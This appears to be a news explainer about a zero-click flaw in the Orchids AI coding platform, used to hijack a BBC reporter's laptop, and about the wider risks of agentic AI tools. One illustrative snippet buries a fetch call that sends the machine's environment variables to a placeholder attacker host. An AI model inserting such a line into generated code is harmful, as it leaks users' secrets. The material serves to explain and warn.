AI Coding Platform Security Flaw Allows BBC Reporter’s Laptop to Be Hijacked
Demonstration of a “Zero-Click” Hack Raises Broader Concerns About Agentic AI Tools With Deep System Access

What Happened
A significant and unresolved cybersecurity vulnerability has been identified in Orchids, a rapidly growing AI-powered coding platform, after a demonstration showed how a BBC reporter’s laptop could be compromised without any direct action from the user.
Orchids markets itself as a “vibe-coding” tool — a system that allows people without programming experience to build apps and games by typing natural-language prompts into a chatbot. The AI then generates and manages the underlying code autonomously. The platform claims to have one million users and lists major companies such as Google, Uber, and Amazon among those using its services.
The vulnerability was demonstrated to the BBC by Etizaz Mohsin, a UK-based cybersecurity researcher originally from Pakistan. Mohsin discovered the flaw in December 2025 while experimenting with vibe-coding systems.
In a controlled test, BBC cyber correspondent Joe Tidy downloaded the Orchids desktop application onto a spare laptop and initiated a simple project. Using a text prompt, he asked the AI to help generate code for a game inspired by the BBC News website. The AI then began automatically generating thousands of lines of code.
Mohsin, exploiting a security weakness that has not been publicly disclosed, was able to gain access to the reporter’s coding project. Without the reporter’s knowledge, he inserted a single line of malicious code into the project’s existing codebase.
Shortly afterward, a notepad file titled “Joe is hacked” appeared on the laptop’s desktop, and the wallpaper was changed to an AI-themed hacker graphic. The demonstration showed that the researcher could access and manipulate the machine remotely.
According to the report, this type of attack qualifies as a “zero-click” exploit, meaning it required no action — such as downloading a file or entering login credentials — from the victim.
The implications of such access could include installing malware, stealing financial or private data, accessing browsing history, or activating cameras and microphones.
Mohsin said he contacted Orchids multiple times over several weeks via email, LinkedIn, and Discord before receiving a response. The company, founded in 2025 and reportedly employing fewer than 10 people, told him it may have missed earlier warnings due to being “overwhelmed with inbound” messages. The BBC states that repeated requests for comment have not been answered.
Experts warn that the flaw highlights a broader security challenge emerging with “agentic” AI systems: tools designed to perform complex actions on users’ devices autonomously.
Why It Matters
The Orchids vulnerability illustrates a fundamental shift in cybersecurity risk as AI tools move from passive assistants to active system operators.
Traditional software vulnerabilities often require user interaction — clicking a malicious link, downloading a file, or revealing login credentials. Agentic AI platforms change that model. When users grant an AI tool deep system permissions so it can write code, manage files, or execute tasks, they effectively expand the attack surface of their device.
In this case, the very feature that makes vibe-coding appealing — autonomous code generation and execution — appears to have enabled remote access without user awareness.
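A minimal sketch makes the shift concrete. The TypeScript below is an assumed, generic pattern, not Orchids’ actual implementation: an agent helper that writes whatever source it receives to disk and runs it locally. Any code that reaches this path, whether generated legitimately or injected by an attacker, executes with the user’s privileges and without anything for the user to click or approve.

// Minimal sketch (an assumed, generic pattern, not Orchids' actual code):
// an agent helper that saves whatever source it receives and runs it locally.
import { writeFileSync } from "node:fs";
import { execSync } from "node:child_process";

// `generatedSource` stands in for code returned by the platform's backend.
// If an attacker can tamper with that channel or with the stored project,
// their code runs here too, with the user's privileges and no click required.
export function runGeneratedCode(generatedSource: string): string {
  writeFileSync("generated.js", generatedSource);
  return execSync("node generated.js", { encoding: "utf8" });
}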
The broader concern is structural rather than isolated. As AI coding agents gain popularity, they are increasingly trusted with full file-system access, internet connectivity, and execution privileges. If vulnerabilities exist in the communication layers or project management infrastructure of such platforms, attackers may exploit them at scale.
Mohsin described the shift as creating “an entirely new class of security vulnerability.” The risk stems from automation combined with user inexperience. Many vibe-coding users lack the technical background to review generated code. A single malicious line inserted among thousands of AI-produced lines could go unnoticed.
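As a purely hypothetical illustration of that last point, consider the kind of helper a vibe-coding tool might emit dozens of times across a project. The function, the game context, and the “telemetry” URL below are invented and are not drawn from the Orchids incident.

// Hypothetical illustration only: routine-looking generated game code with
// one hostile line buried inside. All names and the URL are invented.
interface ScoreEntry {
  player: string;
  score: number;
}

const scores: ScoreEntry[] = [];

// Records a finished round, the sort of helper an AI tool generates by the dozen.
export async function submitScore(player: string, score: number): Promise<void> {
  scores.push({ player, score });

  // Reads like ordinary analytics, but the endpoint is attacker-controlled
  // (a placeholder .invalid domain here) and the payload quietly includes
  // the machine's environment variables.
  await fetch("https://telemetry.example.invalid/collect", {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({ player, score, env: process.env }),
  });
}

A non-programmer reviewing thousands of generated lines has little realistic chance of flagging the one that does not belong.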
This incident also raises questions about startup maturity in the AI boom. Orchids, like many fast-growing AI companies, reportedly operates with a small team while scaling rapidly. When platforms expand user bases before establishing robust security auditing processes, oversight gaps can emerge.
Cybersecurity specialists have warned that AI agents capable of operating messaging apps, calendars, codebases, or financial tools can become high-value targets. Once compromised, they can serve as privileged entry points into corporate or personal systems.
The Orchids case does not necessarily indicate systemic flaws across all vibe-coding platforms. However, it underscores the need for stricter security design, transparent vulnerability response processes, and clearer user guidance about operational risks.
As AI systems become embedded into workflows traditionally handled by trained professionals — including coding, finance, and legal drafting — convenience increasingly competes with caution. The trade-off is subtle: users exchange technical complexity for automation, but also surrender layers of manual oversight.
The rise of agentic AI suggests that cybersecurity frameworks may need to evolve beyond traditional user-based threat models. When AI systems act independently, accountability and monitoring mechanisms must adapt accordingly.
For now, experts recommend isolating experimental AI tools on separate devices, using disposable accounts for testing, and limiting system-level permissions wherever possible.
The Orchids vulnerability serves as an early warning. As AI agents become more capable, the question is no longer whether they can build applications — but whether the systems that empower them are secure enough to protect the people who trust them.


